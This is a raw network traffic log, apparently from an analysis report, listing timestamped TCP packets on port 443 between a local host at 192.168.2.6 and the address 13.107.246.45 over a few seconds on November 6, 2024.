                                              Nov 6, 2024 17:03:46.545942068 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.546104908 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.546119928 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.128036022 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.128613949 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.128653049 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.129132986 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.129137993 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.161292076 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.161874056 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.161900043 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.162326097 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.162341118 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.259331942 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.259500980 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.259601116 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.259702921 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.259722948 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.259733915 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.259738922 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.262713909 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.262753963 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.262839079 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.263045073 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.263057947 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.267323971 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.267700911 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.267726898 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.268141985 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.268146992 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.292474985 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.292936087 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.292962074 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.293358088 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.293364048 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.295032978 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.295121908 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.295171976 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.295274973 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.295289040 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.295299053 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.295304060 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.295785904 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.296127081 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.296140909 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.296566010 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.296571016 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.297816038 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.297846079 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.297935963 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.298058987 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.298075914 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.395915031 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.396078110 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.396164894 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.396279097 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.396307945 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.396322012 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.396327972 CET4435024413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.399106026 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.399154902 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.399215937 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.399409056 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.399424076 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.433970928 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.434010029 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.434056044 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.434066057 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.434099913 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.434278011 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.434294939 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.434325933 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.434331894 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.435249090 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.435323954 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.435374022 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.435501099 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.435527086 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.435544968 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.435554981 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.436973095 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.437012911 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.437073946 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.437207937 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.437237024 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.437244892 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.437257051 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:47.437284946 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.437405109 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:47.437416077 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.002310991 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.002912998 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.002944946 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.003561974 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.003571033 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.072428942 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.075154066 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.075189114 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.075692892 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.075700998 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.136830091 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.136934996 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.136984110 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.137118101 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.137140989 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.137152910 CET50245443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.137167931 CET4435024513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.139812946 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.139847040 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.139918089 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.140024900 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.140043020 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.140913963 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.141199112 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.141218901 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.141633034 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.141638994 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.172693968 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.172755003 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.173274994 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.173286915 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.173707962 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.173712969 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.173935890 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.173950911 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.174273968 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.174278975 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.210134983 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.210197926 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.210297108 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.210325003 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.210668087 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.210676908 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.210688114 CET50246443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.210707903 CET4435024613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.213308096 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.213337898 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.213403940 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.213527918 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.213536024 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.272824049 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.272892952 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.273008108 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.273152113 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.273173094 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.273205996 CET50247443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.273211956 CET4435024713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.275695086 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.275739908 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.275829077 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.275969982 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.275975943 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.302062988 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.302087069 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.302134037 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.302196026 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.302241087 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.302476883 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.302490950 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.302516937 CET50249443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.302522898 CET4435024913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.303781986 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.303801060 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.303849936 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.303860903 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.303905964 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.303977013 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.303989887 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.303998947 CET50248443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.304003954 CET4435024813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.305483103 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.305526018 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.305607080 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.305728912 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.305743933 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.305928946 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.305943012 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.305994987 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.306113958 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.306133032 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.877422094 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.878113985 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.878156900 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.878623962 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.878633022 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.949033976 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.949678898 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.949707031 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:48.950156927 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:48.950174093 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.009180069 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.009206057 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.009265900 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.009284973 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.009339094 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.009610891 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.009630919 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.009645939 CET50250443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.009651899 CET4435025013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.013012886 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.013055086 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.013149023 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.013345003 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.013356924 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.044111013 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.044725895 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.044751883 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.045192957 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.045198917 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.048476934 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.048927069 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.048957109 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.049364090 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.049376965 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.109548092 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.109575987 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.109642982 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.109643936 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.109683990 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.109833002 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.109853983 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.109867096 CET50251443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.109874010 CET4435025113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.112289906 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.112334967 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.112411022 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.112528086 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.112544060 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.161459923 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.162206888 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.162237883 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.162908077 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.162923098 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.174455881 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.174513102 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.174592972 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.174732924 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.174758911 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.174772978 CET50254443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.174781084 CET4435025413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.177576065 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.177608967 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.177697897 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.177849054 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.177860975 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.182138920 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.182193041 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.182245016 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.182346106 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.182359934 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.182372093 CET50253443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.182377100 CET4435025313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.184679031 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.184708118 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.184776068 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.184917927 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.184931993 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.293442011 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.293617964 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.293698072 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.293806076 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.293833971 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.293848038 CET50252443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.293853998 CET4435025213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.296926975 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.296969891 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.297087908 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.297261953 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.297281981 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.746690989 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.747208118 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.747246981 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.747694969 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.747701883 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.837243080 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.837711096 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.837727070 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.838140011 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.838144064 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.885231018 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.885458946 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.885530949 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.885567904 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.885588884 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.885600090 CET50255443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.885605097 CET4435025513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.888484001 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.888514996 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.888606071 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.888766050 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.888781071 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.916467905 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.916960001 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.916990042 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.917393923 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.917399883 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.926556110 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.926855087 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.926867962 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.927220106 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.927225113 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.967647076 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.967700958 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.967756987 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.967782974 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.967813969 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.968040943 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.968050003 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.968060970 CET50256443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.968065023 CET4435025613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.970894098 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.970944881 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:49.971030951 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.971183062 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:49.971208096 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.030152082 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.030601025 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.030628920 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.031028032 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.031034946 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.051230907 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.051264048 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.051333904 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.051333904 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.051390886 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.051517963 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.051532984 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.051544905 CET50257443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.051551104 CET4435025713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.054457903 CET50262443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.054495096 CET4435026213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.054557085 CET50262443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.054742098 CET50262443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.054758072 CET4435026213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.160245895 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.160265923 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.160320044 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.160434961 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.160680056 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.160697937 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.160712004 CET50259443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.160717964 CET4435025913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.163328886 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.163364887 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.163439035 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.163645983 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.163659096 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.177247047 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.177275896 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.177290916 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.177367926 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.177387953 CET4435025813.107.246.45192.168.2.6
